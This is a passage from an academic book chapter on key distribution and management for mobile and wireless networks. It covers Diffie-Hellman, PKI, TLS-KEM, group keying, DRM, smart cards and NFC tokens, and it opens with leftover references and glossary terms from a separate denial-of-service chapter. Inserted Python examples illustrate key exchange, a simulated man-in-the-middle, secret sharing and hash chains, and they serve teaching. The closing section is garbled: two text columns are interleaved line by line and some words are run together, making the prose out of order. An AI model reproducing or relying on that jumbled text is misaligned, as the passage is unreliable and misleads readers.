Shields, C. (2002). What do we mean by network denial of service? In Proceedings of the 2002 IEEE Workshop on Information Assurance (pp. 196-203). U.S. Military Academy.

Strand, L. (2004). 802.1x port-based authentication HOWTO. Retrieved July 15, 2005, from http://www.tldp.org/HOWTO/8021X-HOWTO

Takahashi, T. (2004). WPA passive dictionary attack overview (White Paper).

Yih-Chun, H. (2006). Wormhole attacks in wireless networks. IEEE Journal on Selected Areas in Communications, 24(2), 370-380.

Additional Important Links/References:

CERT Coordination Center References

http://www.cert.org/advisories/CA-2000-11.html
http://www.cert.org/research/JHThesis/Chapter11.html
http://www.cert.org/incident_notes/IN-2000-04.html
http://www.cert.org/tech_tips/denial_of_service.html
http://www.cert.org/archive/pdf/DoS_trends.pdf
http://www.cert.org/research/isw/isw2000/papers/42.pdf

Other links

http://www.kb.cert.org/vuls/
http://www.usenix.org/publications/login/2000-7/apropos.html


Vulnerability Analysis

KEY TERMS

Denial of Service (DoS): Denial of service attacks prevent legitimate users from receiving services from the service provider.

Distributed Denial of Service (DDoS): DDoS is a type of DoS attack conducted by using multiple sources that are distributed throughout the network.

Flooding Attack: A flooding attack involves the generation of spurious messages to increase traffic on the network in order to consume the server's or the network's resources.

Information Security: Information security is a mechanism dealing with providing confidentiality, integrity, authentication, and non-repudiation.

Network Security: Network security is a mechanism dealing with protection of the networking system as a whole and sustaining its capability to provide connectivity between the communicating entities.

Spoofing Attack: A spoofing attack involves the creation of packets with a forged or faked source IP address.

Wireless Networks: Wireless networks are based on a technology that uses radio waves or radio frequencies to transmit or send data.




Chapter XI
Key Distribution and Management for Mobile Applications

György Kálmán
University Graduate Center – UniK, Norway

Josef Noll
University Graduate Center – UniK, Norway

ABSTRACT

This chapter deals with challenges raised by securing transport, service access, user privacy, and accounting in wireless environments. Key generation, delivery, and revocation possibilities are discussed and recent solutions are shown. Special focus is on efficiency and adaptation to the mobile environment. Device domains in personal area networks and home networks are introduced to provide personal digital rights management (DRM) solutions. The value of smart cards and other security tokens is shown, and a secure and convenient transmission method is recommended based on the mobile phone communication technology.

A PROBLEM OF MEDIA ACCESS

On the dawn of ubiquitous network access, data protection is becoming more and more important. While in the past network connectivity was mainly provided by wired connections, which are still considered the most secure access method, current and future users are moving towards wireless access and only the backbone stays connected by wires. In a wired environment eavesdropping exists, but it is not as widespread and not as easy to implement. While methods exist to receive electromagnetic radiation from unshielded twisted pair (UTP) cables, quite good protection can already be achieved by transport layer encryption or by deploying shielded twisted pair (STP) or even fibre.

New technologies emerged in the wireless world, and especially the IEEE 802.11 family has drastically changed the way users connect to networks. The most basic requirement for new devices is the capability of supporting wireless service access. The mobile world introduced the general packet radio service (GPRS), and third generation (3G) mobile systems provide permanent IP connectivity; together with Wi-Fi access points they provide continuous wireless connectivity. Besides communication devices such as laptops and phones, cars, machines, and home appliances nowadays also come with wireless/mobile connectivity.

Copyright © 2008, IGI Global, distributing in print or electronic forms without written permission of IGI Global is prohibited.
Key Distribution and Management for Mobile Applications

Protecting user data is of key importance for all communications, and especially for wireless communications, where eavesdropping, man-in-the-middle, and other attacks are much easier. With a simple wireless LAN (WLAN) card and the corresponding software it is possible to capture, analyse, and potentially decrypt wireless traffic.

The implementation of the first WLAN encryption standard, wired equivalent privacy (WEP), had serious weaknesses. Encryption keys can be recovered with a laptop in promiscuous mode in less than a minute, and this can be done by a hidden attacker somewhere in the surroundings. Data protection is even worse in places with public access and on factory-default WLAN access points without activated encryption. Standard Internet protocols such as the simple mail transfer protocol (SMTP) do not encrypt messages, thus all user data are transmitted in plaintext. Sending an e-mail over an open access point therefore has the same effect as broadcasting its content. With default firewall settings an intruder has access to local files, since the local subnet is usually placed inside the trusted zone. These examples emphasise that wireless links need some kind of traffic encryption.

When the first widespread digital cellular network was developed around 1985, standardisation of the global system for mobile communication (GSM) introduced the A5 cryptographic algorithms, which can nowadays be cracked in real time (A5/2) or near real time (A5/1). A further security threat is the lack of mutual authentication between the terminal and the network. Only the terminal is authenticated; the user has to trust the network unconditionally. In the universal mobile telecommunications system (UMTS), strong encryption is applied on the radio part of the transmission and provides adequate security for current demands, but does not secure the transmission over the backbone. UMTS provides mutual authentication through an advanced mechanism for authentication and session key distribution, named authentication and key agreement (AKA).

Figure 1. A basic problem of broadcast environment

A LONG WAY TO SECURE COMMUNICATION

Applying some kind of cryptography does not imply secured access. Communicating parties must negotiate the key used for encrypting the data. It should be obvious that the encryption key used for the communication session (the session key) cannot be sent over the air in plaintext (see Figure 1). In order to enable encryption even for the first message, several solutions exist. The simplest one, as used in cellular networks, is a preshared key supplied to the mobile terminal beforehand. This key can then be used for initialising the security infrastructure and can act as a master key in future authentications.

In more dynamic systems the use of preshared keys can be cumbersome. Most WLAN encryption methods support this kind of key distribution. The key is taken to the new unit with some kind of out-of-band method, for example with an external unit, as indicated in Figure 2. Practically all private and many corporate WLANs use static keys, allowing an eavesdropper to capture huge amounts of traffic and thus enabling easy decryption of the content. This implies that a system with just a secured access medium can be easily compromised. Non-aging keys can compromise even the strongest encryption, thus it is recommended to renew the keys from time to time.

Outside the telecom world it is harder to distribute keys beforehand, so key exchange protocols emerged, which offer protection from the first message and do not need any preshared secret.



Figure 2. (a) Diffie-Hellman key exchange and (b) out-of-band key delivery

The most widespread protocol is the Diffie-Hellman (DH) key exchange of Figure 2, which allows two parties that have no prior knowledge of each other to jointly establish a shared secret key over an insecure communications channel. This protocol does not authenticate the nodes to each other, but enables the exchange of data which can be decoded only by the two parties. Malicious attackers may start a man-in-the-middle attack (see Figure 3). Since this problem is well known, several modifications enable identity-based DH; for example Boneh, Goh, and Boyen (2005) showed a hierarchical identity-based encryption method, which operates in fact as a public key system where the public key is a user-chosen string.

Public key infrastructure (PKI) can help defend the corresponding parties against man-in-the-middle attacks. Public key cryptography is based on problems for which no efficient (polynomial-time) algorithm is known, for example integer factorisation or the discrete logarithm on elliptic curves. Two keys, a public and a private one, are generated. The public key can be sent in plaintext, because messages encrypted with the public key can only be decrypted with the private key and vice versa. The two-way nature of key pairs makes it possible to authenticate users to each other, since signatures generated with the private key can be checked with the public key. Message authenticity can thus be guaranteed. Still, the identity of the node is not proven: the signature proves only that the message was signed by the holder of the private key belonging to the public key of the entity we may want to communicate with.

Identity can be ensured by using certificates. Certificate authorities (CA) store public keys and, after checking the owner's identity out of band, vouch for that identity by signing the public key and user information with their own keys. This method is required for financial transactions and business and government operations.
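The exchange of Figure 2(a), the attack of Figure 3, and the effect of binding each public value to a verifiable long-term key, as an added example in Python (not code from the chapter or from any of the papers it cites). It uses the 2048-bit MODP group of RFC 3526 (group 14). The long-term key shared out of band, the HMAC standing in for a certificate-backed signature, and all function names are assumptions of this illustration.

```python
# Added example (not from the chapter): unauthenticated Diffie-Hellman, the
# man-in-the-middle attack on it, and an authenticated variant.  Standard
# library only.  Group: the 2048-bit MODP group of RFC 3526 (group 14).
import hashlib
import hmac
import secrets

P = int(
    "FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74"
    "020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F1437"
    "4FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7ED"
    "EE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF05"
    "98DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB"
    "9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3B"
    "E39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF695581718"
    "3995497CEA956AE515D2261898FA051015728E5A8AACAA68FFFFFFFFFFFFFFFF", 16)
G = 2
PLEN = (P.bit_length() + 7) // 8          # 256 bytes


def keypair():
    """Private exponent x and public value g^x mod p."""
    x = secrets.randbelow(P - 2) + 1
    return x, pow(G, x, P)


def session_key(own_priv, peer_pub):
    """K = H(g^xy): hashing turns the group element into a fixed-length key."""
    shared = pow(peer_pub, own_priv, P)
    return hashlib.sha256(shared.to_bytes(PLEN, "big")).digest()


def honest_exchange():
    """Figure 2(a): both parties derive the same key."""
    a, A = keypair()
    b, B = keypair()
    return session_key(a, B) == session_key(b, A)


def man_in_the_middle():
    """Figure 3: Mallory replaces A and B with her own value M.  Alice and Bob
    each end up sharing a key with Mallory, who relays and reads everything;
    neither notices, because nothing in plain DH ties a value to an identity."""
    a, A = keypair()
    b, B = keypair()
    m, M = keypair()
    k_alice = session_key(a, M)           # Alice believes M came from Bob
    k_bob = session_key(b, M)             # Bob believes M came from Alice
    mallory_has_both = (k_alice == session_key(m, A)) and (k_bob == session_key(m, B))
    return mallory_has_both and k_alice != k_bob


def mac_tag(long_term_key, pub):
    return hmac.new(long_term_key, pub.to_bytes(PLEN, "big"), hashlib.sha256).digest()


def authenticated_exchange(attacker_present):
    """Each public value is bound to a long-term secret the peer can verify.
    An HMAC under a key delivered out of band (Figure 2(b)) stands in for the
    certificate-backed signature a PKI would supply; the defence is the same:
    a substituted value fails verification and the exchange aborts.
    Returns True if the handshake completes, False if it is rejected."""
    lt_key = secrets.token_bytes(32)      # assumed delivered out of band (illustration)
    a, A = keypair()
    b, B = keypair()
    sent_A, tag_A = A, mac_tag(lt_key, A)
    sent_B, tag_B = B, mac_tag(lt_key, B)
    if attacker_present:
        _, M = keypair()
        sent_A = M                        # Mallory cannot recompute tag_A without lt_key
    if not hmac.compare_digest(mac_tag(lt_key, sent_A), tag_A):
        return False                      # Bob rejects the forged value
    if not hmac.compare_digest(mac_tag(lt_key, sent_B), tag_B):
        return False                      # Alice checks Bob's value the same way
    return session_key(b, sent_A) == session_key(a, sent_B)
```

With a PKI the tag would be a signature over the public value, checked against a CA-issued certificate, which removes the need for a preshared long-term key; the rejection logic is unchanged. A MAC or signature only proves that the peer holds the long-term key, which is exactly the point the text makes about identity: binding that key to a person or device is the certificate's job.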



Figure 3. Principle of a man-in-the-middle attack

Without a CA, the public keys can still be gathered into a PKI-like exchange service. Here, most commonly, a method called web of trust is used. A number of nodes who believe that the key is authentic submit their opinion by creating a signature. The solution enables community or personal key management, with a considerable level of authenticity protection.

While public keys can be sent, private keys must be kept secret. Although they are usually protected with an additional password, this is the weakest point in the system. If the user saves a key in a program in order to enter the key automatically, the security provided by the system is equal to the security of that program's agent application. Personal firewalls and operating system policies usually will not stop a well-equipped intruder.

Another security issue for terminals is the lack of tamper-resistant storage. Usage of smart cards is a solution to this issue, but introduces additional hardware requirements. The lack of secure storage is getting much attention in DRM schemes. Most DRM schemes use a software-based method, but hardware-assisted ones have lately been introduced as well.

All these authentication methods, secure storage, and rights management support secure data exchange, but they do not protect the privacy of user credentials, preferences, and profiles. Ad hoc networks like personal area networks (PANs), which move around and are dynamically configured, are open to intrusion attacks on privacy. Thus, protection of user credentials in wireless environments is one of the focal points of current research. Before addressing privacy, we will first summarise issues in key management protocols.

FROM KEY EXCHANGE TO ACCESS CONTROL INFRASTRUCTURE

Mobility and wireless access introduced new problems in network and user management, as compared to fixed network installations with, for example, port-based access restrictions. Network operators want to protect the network against malicious intruders, charge the correct user for the use, and provide easy and open access to their valued services.

The first step to get access to an encrypted network is to negotiate the first session key. This has been solved in coordinated networks like mobile networks through preshared keys. Authentication and access control are provided by central entities to ensure operations.

In computer networks, which are not controlled in such a way and usually not backed by a central authorisation, authentication, and accounting (AAA) system, different methods have been created for connection control. The basic method is still to negotiate encryption keys based on a preshared secret. Typical preshared keys are a password used for hash calculation, a one-time password sent via cell phone, or keys handed over on a USB stick.

There are several solutions to protect the data transmitted over a wireless link. In private networks, security based on preshared keys is a working solution. In corporate or public networks, a more robust solution is needed. The most promising way is to integrate session key negotiation into the AAA process. Since providers or companies have to identify the connected user, they rely on an AAA infrastructure and have encryption of user credentials as a compulsory policy. A certificate-based medium access control and AAA system is advised, where AAA messages can also carry the certificates needed to secure the message exchange.

As public key operations induce a lot of network traffic, the negotiated session keys have to be used in the most efficient way. Encryption protocols designed for wired environments, like transport layer security (TLS), do not consider the problems associated with broadcast transmissions and the limitations of mobile devices.



Figure 4. TLS key negotiation

Figure 5. TLS-KEM key negotiation

In a wired, or at least fixed, environment the computational cost of key negotiations is usually neglected. For example, TLS uses several public key operations to negotiate a session key. This can be a problem for mobile devices, since the computational cost is much higher for asymmetric encryption. The standard TLS suite uses many cryptographic operations and generates too large a message load on wireless links (see Figure 4). If a mobile device wants to execute mutual authentication with a service provider, with certificate exchanges, this can lead to large amounts of data transferred over the radio interface, besides the high computing power needs.

In environments with limited resources, authentication and identity management based on preshared keys is still the most effective solution. Badra and Hajjeh (2006) propose an extension to TLS which enables the use of preshared secrets instead of asymmetric encryption. This is in line with the efforts to keep resource needs at the required minimum level in mobile devices. A preshared key solution was also proposed by the 3rd Generation Partnership Projects (3GPP, 2004) and (3GPP2, 2007) as an authentication method for wireless LAN interworking. The problem with the proposed solution is that preshared keys provide neither adequate secrecy nor identity protection in Internet connections. To deal with this problem, the TLS key exchange method (TLS-KEM) provides identity protection, minimal resource need, and full compatibility with the original protocol suite, as seen in Figure 5. In direct comparison, public key based TLS needs a lot more computing, data traffic, and deployment effort.

In UMTS networks, an array of authentication keys is sent to the mobile in authentication vectors. In the computer world a good solution would be using hash functions to calculate new session keys, as these consume little power and require little computing.

A moving terminal can experience a communication problem, as the overhead caused by key negotiation might extend the connection time to a network node. A preserved session key for use in the new network is a potential solution in a mobile environment, as it speeds up the node's authentication. Lee and Chung (2006) recommend a scheme which enables the reuse of session keys. Based on the AAA infrastructure, it is possible to forward the key to the new corresponding AAA server over a protected network and use it for authentication without compromising system security. This can reduce the delay for connecting, and also reduces the possibility of authentication failure. Since the old session key can be used for authenticating the node towards the new AAA server, a connection to the home AAA is not needed any more.



The messages are exchanged as follows (Lee & Chung, 2006): when sending the authorisation request to the new network, the node also includes the address of the old network it had. The foreign agent connects to the new local AAA server and sends an authentication request. The new AAA server connects to the old one, sending a message to identify the user. The old AAA authenticates the message by checking the hash value included, and generates a nonce for the terminal and the foreign agent. The server composes an AAA-terminal answer, which consists of a plain nonce and a nonce encrypted using the key shared between the old foreign agent and the terminal. Then the whole message is signed and encrypted with the key used between the two AAA servers. When the new AAA server receives it, it decrypts and forwards the message to the new foreign agent. Based on the plain nonce, the agent generates the key and sends down the reply, which also includes the nonce encrypted by the old AAA. After the authentication of the user towards the network, the user can start using services.

Key distribution and efficiency in e-commerce applications is another important aspect. The network's AAA usually does not exchange information with third parties, or cannot use the authentication data of the network access because of privacy issues. Current security demands require mutual identification of the communicating parties in an e-commerce application. This can easily lead to exposing the customer to companies (for example in a GSM network, the user has to trust the network unconditionally). If the user can also check the identity of the service provider, at least man-in-the-middle attacks are locked out.

When a user starts a new session with a service provider, this session should be based on a new key set. The session key has to be independent from the previous one in terms of traceability, and the user identity should not be deducible from the session key, thus ensuring user privacy. For mutual identification, a key exchange method is proposed by Kwak, Oh, and Won (2006), which uses hash values to reduce resource need. The key calculation is based on random values generated by the parties, which ensures key freshness.

The use of hash functions is recommended in mobile environments, providing better performance than public key based mechanisms (Lim, Lim, & Chung, 2006). Mobile IPv4 uses symmetric keys and hashes by default. Since symmetric keys are hard to manage, a certificate-based key exchange was recommended, but this demands more resources. To lower the resource demand, a composite architecture was recommended (Sufatrio, 1999). The procedure uses certificates only in places where the terminal does not require processing of the public key algorithm and does not require storage of the certificate. The result of the comparison shows that hashing is by far the most efficient method in terms of key generation, but suffers from management difficulties. Lim et al. (2006) also demonstrate that pure certificate-based authentication is unsuitable in mobile environments. Partial use of certificates and identity-based authentication with extensive use of hash functions can be a potential way ahead.

AUTHENTICATION OF DEVICE GROUPS

In a ubiquitous environment, moving networks appear. PANs and ad hoc connections based on various preferences emerge and fall apart. These devices communicate with each other and usually have very limited capabilities in terms of computing power and energy reserves. In order to provide secure communication between any parts of the network, hierarchical key management methods emerged (Kim, Ahn, & Oh, 2006). Here a single trusted server is used to manage the group key. These entities usually store the keys in a binary tree, where the member nodes are the leaves.

Public key operations are usually required when a terminal wants to connect to a group for the first time. A group management system needs frequent key generation rounds, because it has to ensure forward and backward secrecy. Strict key management policies ensure that no new node is capable of decoding former traffic and none of the old nodes has the possibility to decrypt current traffic. To adjust resource usage to the mobile environment, a management scheme which uses mainly simple operations like XOR and hash is advisable (Kim et al., 2006).


Figure 6. Keys in a binary tree

As the key in the root of the binary tree is used to authenticate the whole group, keys need to be regenerated when a node leaves the network. This procedure starts from the parent of the former node and goes up to the root. Then the management unit sends out the new keys in one message. Building a tree from keys ensures fast searches and a simple, clean structure. In addition, all keys in the internal nodes are group keys for the leaves under them, so a subset of devices can be easily addressed.

The root unit has to compute these keys in acceptable time, requiring a more complex architecture. In PANs this is usually not a problem, but when a member of a larger subnet is leaving, calculations could be more demanding. A standard group key handling method is Tree-based Group Diffie-Hellman (TGDH), where the management steps assume that all nodes have the same processing capabilities. To ensure maximal efficiency, the highest-performance unit shall be the one in the root of the tree (Hong & Lopez-Benitez, 2006). When node computing capabilities show big differences, the overhead caused by tree transformations does not represent a drawback.

Another significant group of devices that need encryption can be found in home networks, where the focus is on management of content and personal data.

SECURE HOME NETWORK AND RIGHTS MANAGEMENT

Deployment of wired or wireless home networks happens in roughly 80% of all households with broadband access (Noll, Ribeiro, & Thorsteinsson, 2005). Network-capable multimedia devices, media players, game consoles, and digital set-top boxes are widespread and part of the digital entertainment era. Content is stored within this network, and provided through the Internet to other users. Since the birth of peer-to-peer (P2P) networks, such technologies are in the crosshairs of content providers. Recently, some software developers and a few musicians started using the torrent network for cost-effective delivery of their content. A digital rights management method designed for such a network is still missing.

Current rights protection solutions are not compatible with each other and their user friendliness also varies. The basic problem is that only very few devices are equipped with tamper-resistant storage and integrated cryptographic capabilities. Besides software solutions, which are considered weak solutions, hardware-based encryption can severely limit the lawful use of digital content. Recent lawsuits related to Sony's rootkit protection mechanism also reveal that the customer's rights of usage are considered to be more important than the legitimate wish of content providers to protect the content.

Trusted platform modules (TPM) are the most likely candidate for content protection in hardware-based solutions. While providing encryption capabilities, it is very likely that these components will be used to take away the users' right to decide over their own resources.

The current discussions on DRM for audio content are regarded as minor when compared to high definition (HD) content protection. Even the connection to the screen has to use strong encryption, which has to exceed GSM/UMTS encryption in order to be acceptable for content providers. Enforcing a digital, end-to-end encrypted stream means that an HD-TV purchased at the end of 2006 may not work with the new encryption standards for HD. There is no current solution for computers to legally play full-resolution HD. By the end of 2006 it was announced that a workaround is arising to deal with the advanced content protection system of HD.



A more discreet, but not intrusive business model discussion for digital content management is presented in order to visualise the requirements of this market. Apple's FairPlay enables making backup copies of audio tracks, which is permitted by law in several European countries, and copying of content between the user's iPod players. This solution is considered too open by some content providers, and the distribution is limited to a server-client infrastructure. For HD content with high bandwidth needs such a server-client infrastructure is not advisable, both from a server and from a network point of view. The ever-growing P2P networks form a perfect infrastructure to deliver content with high bandwidth needs practically without substantial transmission costs. P2P networks are usually run without any DRM support. An additional infrastructure supporting DRM in a P2P network used to transmit content will enable high-volume distribution of digital content (Pfeifer, Savage, Brazil, & Downes, 2006). If seamless license delivery and user privacy could be guaranteed, such a network could be the foundation of a low-cost content delivery scheme.

While the usage of P2P networks is an excellent idea, the solution proposed by Nützel and Beyer (2006) is similar to Sony's rootkit solution: it bypasses user control and is thus not acceptable. While the primary goal is to secure content, the software used in such solutions acts like a hidden Trojan and opens backdoors not only for the content providers, but also for other attackers.

Content usage across platforms is not supported yet, as a common standard does not exist. Pfeifer et al. (2006) suggest a common management platform for DRM keys with an XML-based, standard MPEG-REL framework. Users will also produce content with digital protection, in order to ensure that personal pictures cannot be distributed electronically. Social networks and groups of interest, as well as distribution of content in PANs, are a challenge for DRM development. Zou, Thukral, and Ramamurthy (2006) and Popescu, Crispo, Tanenbaum, and Kamperman (2004) propose a key delivery architecture for device groups, which could be extended by a local license manager. The central key management unit could distribute licenses seamlessly to the device which wants to get access, without intruding on the user experience. Kálmán and Noll (2006) recommend a phone-based solution. This represents a good trade-off between user experience and content protection. The phone is practically always online, and most of them have Bluetooth or other short-range radio transmitters, so licenses can be transmitted on demand. Since the phone has a screen and a keyboard, it is possible to request authorisation from the user before every significant message exchange, so the user can control the way licenses are distributed.

If we look aside from the issues related to business aspects, computational issues still remain. Highly secure DRM entities will use asymmetric encryption and certificates. Sur and Rhee (2006) recommend a device authentication architecture which eliminates traditional public key operations except the ones on the coordinator device. This is achieved by using hash chains that encode the permission; for example, a device can get keys to play a designated audio track ten times, or permission to use five daily permits on demand. Such schemes allow end devices to be simpler and lower the network communication overhead.

If a central device is not desired, a composite key management scheme may be used. The parties in the PAN will form a web of trust like in a confidentiality scheme, for example pretty good privacy (PGP). In this web, the main key is split between nodes and cooperation is needed for significant operations. This means that if the scheme operates on a (k, n) threshold basis, any k of the n shares reconstruct the key: up to n-k nodes can be lost before the remaining nodes can no longer reconstruct it and a new key has to be generated, while up to k-1 compromised shares reveal nothing about the key. Fu, He, and Li (2006) mention the PAN's ad hoc nature as the biggest problem. Since this scheme selects n nodes randomly, the ones that move between networks fast can cause instability in the system. Also, the resource need of this proposal is quite high on all nodes present.

When a scheme enables off-line use of license keys, attention should be given to problems arising from leaving or compromised nodes. Identity-based schemes have become popular recently because of their efficiency in key distribution. The main drawback is that these proposals do not provide a solution for revocation and key renewal. Hoeper and Gong (2006) propose a solution based on a heuristic (z, m) method.
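The (k, n) threshold splitting of the PAN's main key described above, as an added example in Python (not the chapter's or Fu et al.'s code): Shamir's scheme over a prime field, with a demonstration that any k surviving shares rebuild the key while k − 1 shares do not. The field prime, the share layout and the function names are this illustration's own choices.

```python
# Added example (not the chapter's or Fu et al.'s code): Shamir (k, n) secret
# sharing over a prime field, as used to split a PAN's main key between nodes.
import random
import secrets

PRIME = 2 ** 127 - 1                      # Mersenne prime; secrets must be < PRIME


def split(secret, k, n):
    """n shares (x, f(x)) of a random degree-(k-1) polynomial with f(0) = secret."""
    if not 0 <= secret < PRIME or not 1 <= k <= n:
        raise ValueError("bad parameters")
    coeffs = [secret] + [secrets.randbelow(PRIME) for _ in range(k - 1)]

    def f(x):
        return sum(c * pow(x, i, PRIME) for i, c in enumerate(coeffs)) % PRIME

    return [(x, f(x)) for x in range(1, n + 1)]


def reconstruct(shares):
    """Lagrange interpolation at x = 0.  Correct only if len(shares) >= k;
    with fewer shares the result is some field element, not the secret."""
    total = 0
    for i, (xi, yi) in enumerate(shares):
        num, den = 1, 1
        for j, (xj, _) in enumerate(shares):
            if i != j:
                num = num * (-xj) % PRIME
                den = den * (xi - xj) % PRIME
        total = (total + yi * num * pow(den, PRIME - 2, PRIME)) % PRIME
    return total


def demo(k=3, n=5):
    """n-k nodes drop out: the remaining k shares still rebuild the key;
    k-1 of them do not."""
    secret = secrets.randbelow(PRIME)
    shares = split(secret, k, n)
    lost = set(random.sample(range(n), n - k))          # which nodes went away
    survivors = [s for i, s in enumerate(shares) if i not in lost]
    ok_with_k = reconstruct(survivors) == secret
    too_few = reconstruct(survivors[:k - 1]) != secret
    return ok_with_k, too_few
```

In the PAN each node keeps one share and a quorum of k reconstructs (or, better, jointly uses) the key. Losing more than n − k nodes over the lifetime of the group is the case the text describes, where a new key has to be generated; that is the revocation and renewal problem the next paragraphs turn to.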



The solution is similar to the threshold scheme shown before, but enables key revocation. If z nodes accuse one node of being compromised, based on their own observations, the node is forced to negotiate a new key. If a node reaches a threshold in the number of regenerations in a time period, it could be locked out, since most likely an intruder is trying to get into the system or the internal security of the node is not good enough. The assumptions about the system strongly limit the effectiveness of the solution. The most stringent assumption is that nodes are required to be in promiscuous mode. This can lead to serious energy problems. Another requirement is that there has to be a unit for out-of-band key distribution. This unit could be the cellular phone.

SMART CARDS AND CELLULAR OPERATORS

The use of smart cards has its roots in the basic problem of security infrastructures: even the most well-designed system is vulnerable to weak passwords. A card, which represents a physical entity, can be protected much more easily than the theoretical possession of a password. Smart cards integrate tamper-resistant storage and cryptographic functions. They are usually initialised with a preshared key, from which a hash chain is created whose values can be used as authentication tokens. The remote authentication server uses the same function to calculate the next member of the chain. The critical design choice is the selection of a one-way (preimage-resistant) and collision-resistant hash function. While the tokens they provide are quite secure, a problem with smart cards is that they represent a new unit that has to be present in order to enable secure communication, and user terminals must be equipped with suitable readers. The additional hardware does not only cause interoperability problems, but is usually slow, as a measurement shows (Badra & Hajjeh, 2006). This becomes evident when heavy traffic is associated with asymmetric encryption: sending a "hello" message with standard TLS to the smart card needed 10 seconds. In contrast, the modified TLS-KEM needed 1.5 s.

A user-friendly, seamless key delivery system can be created with the help of cellular operators and SIM cards with enhanced encryption capabilities. The SIM and USIM modules used in GSM/UMTS are quite capable smart cards. They offer protected storage with the possibility of over-the-air key management, a good user interface, and a standard architecture. Danzeisen, Braun, Rodellar, and Winiker (2006) show the possible use of the mobile operator as a trusted third party for exchanging encryption keys out of band for other networks.

Delivery of the mobile phone key to a different device can be problematic, since most devices do not have a SIM reader, or it is inconvenient to move the SIM card from the mobile phone to another device. New developments in near field communication may overcome this and enable short-range secure key transfer.

BREAKING THE LAST CENTIMETRE BOUNDARY

The frequency of authentication requests is a key factor in user acceptance. If a system permanently asks for new passwords or new values from the smart card hash chain, it will not be accepted by the user. On the other hand, if a device gets stolen and it asks for a password only when it is switched on, then a malicious person can impersonate the user for a long time. A potential solution is to create a wearable token with some kind of wireless transmission technology and define the device behaviour such that if the token is not accessible, the device disables itself in the very moment of notification.

Since the main challenge is not securing the data transfer between the terminal and the network, but authenticating the current user of the terminal, a personal token has to be presented. As proposed by Kálmán and Noll (2007), the mobile phone can be a perfect personal authentication token if it is extended by a wireless protocol for key distribution.

With the capabilities of user interaction and network control of the mobile phone, it can be ensured that critical operations will need user presence by requiring PINs or passwords.


Key Distribution and Management for Mobile Applications

(BT),radiofrequencyidentification(RFID),and phones and a public key connected to that one.


Near Field Communications (NFC). NFC is a Based on this, DH key exchange would be possible
successor of RFID technology in very short range between terminals and the phone using the cellular
transmissions. BT is close to the usability limit, network as a gateway. An NFC-enabled phone could
since its transmit range reaches several meters. be the central element of a home DRM service, as
But the two later ones are promising candidates. it is online, capable of over the air downloads, and
Depending on the frequency, general RFID has still able to ensure user control.
a range of several meters while NFC operates in
the 0-10 cm range. NFC is recommended, as the
range alone limits the possibilities of eavesdroppers on tHE dAwn on PErsonAl
and intruders who want to impersonate the token contEnt MAnAgEMEnt
while it is absent. The use of repeaters in the case
of NFC, a so-called wormhole attack as described From the viewpoint of secure data transmission
by Nicholson, Corner, and Noble (2006), looks and user authentication, access and distribution of
not feasible because of the tight net of repeaters digital content can be ensured. Open issues remain
required. Also, the capability of user interaction for moving PANs and devices with limited capa-
provides an additional level of security. bility. Focus nowadays is on protecting the user’s
Mobile phones with integrated NFC functional- privacy. As usage of digital devices with personal
ity are already available and serve as user authen- information was limited, user privacy was not of
tication devices. To use these devices as tokens for primary concern for a long time. Since PANs and
other terminals, they have to be placed very close home networks hold a large amount of critical
to each other. This prevents accidental use in most personal data, this has to change (Jeong, Chung,
cases. To check presence of the token, heartbeat & Choo, 2006; Ren, Lou, Kim, & Deng, 2006).
messages might be introduced. By design, this In a ubiquitous environment users want to ac-
solution is very capable of distributing preshared cess their content wherever they are. This has to
keys for other devices out of band. Meaning, the be enabled in a secure manner. With upcoming
phone can get the keys from the cellular network social services, also fine grained access contro
from an identity provider and send it down to the methods have to be deployed inside the personal
appropriate device by asking the user to put the infrastructure. The focus of DRM research has to
devices close to each other for a second or two. shift towards the end user, who will also require the
Transmission of the key must be done only right to protect himself/herself and his/her content
when needed, so the programmable chip on the with the same strength as companies do.
phones has to be in a secured state by default and Extending the phone’s functions may be prob-
only activated by the user’s interaction. Protection lematic because of energy consumption and limited
of RFID tags is shown by Rieback, Gaydadjiev, computing power. This could be easily solved by
Crispo, Hofman, and Tanenbaum (2006), where a the technology itself, since a new generation of
proprietary hardware solution is presented. In case mobile terminals is arriving every half year. The
of a phone-based NFC key transmission, additional capacity and functionalities of the SIM cards will
active devices might be unnecessary to use, but be extended, the newest 3GPP proposals are pre-
for general privacy protection, IDs with RFID dicting high capacity and extended cryptographic
extensions must be treated with care. possibilities.
Transmissionofcertificateswould - not needadlegal aspects, extending the SIM
Regarding
ditional encryption over the NFC interface, while possibilities may cause some concern, since the
other keys may require a preshared key between SIM cards are currently owned by the network
the phone and the terminals, which can be done operators.
via a wired method or by the phone provider. Most
providers have at least one secret key stored on
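As an added illustration of the smart-card hash-chain scheme described under Smart Cards and Cellular Operators (example code, not from the chapter), the following Python models a card initialised with a preshared key that releases chain members in reverse order as one-time tokens, and a server that verifies each member with one application of the same hash function and rejects replays. The class names, SHA-256 as the chain function, the chain length and the constructed secret are assumptions.

```python
import hashlib
import hmac
import os


def hash_step(value: bytes) -> bytes:
    """The one-way function shared by card and server (SHA-256, an assumption)."""
    return hashlib.sha256(value).digest()


class HashChainCard:
    """Models the smart card: it holds the preshared secret and walks the chain backwards.

    The card computes h_0 = secret, h_i = H(h_{i-1}) up to h_n once, hands h_n to the
    server as the anchor, and then releases h_{n-1}, h_{n-2}, ... as authentication tokens.
    h_0 itself (the preshared key) is never released.
    """

    def __init__(self, preshared_key: bytes, length: int):
        self._chain = [preshared_key]
        for _ in range(length):
            self._chain.append(hash_step(self._chain[-1]))
        self._next_index = length - 1

    @property
    def anchor(self) -> bytes:
        return self._chain[-1]

    def next_token(self) -> bytes:
        """Release the next unused chain member; each token is usable exactly once."""
        if self._next_index < 1:
            raise RuntimeError("hash chain exhausted; card must be re-initialised")
        token = self._chain[self._next_index]
        self._next_index -= 1
        return token


class AuthServer:
    """Models the remote authentication server: it stores only the last accepted member."""

    def __init__(self, anchor: bytes):
        self._last_accepted = anchor
        self.rejected = 0

    def verify(self, token: bytes) -> bool:
        # Applying the same function once must yield the previously accepted member.
        # A captured token cannot be replayed, because after acceptance it is no longer
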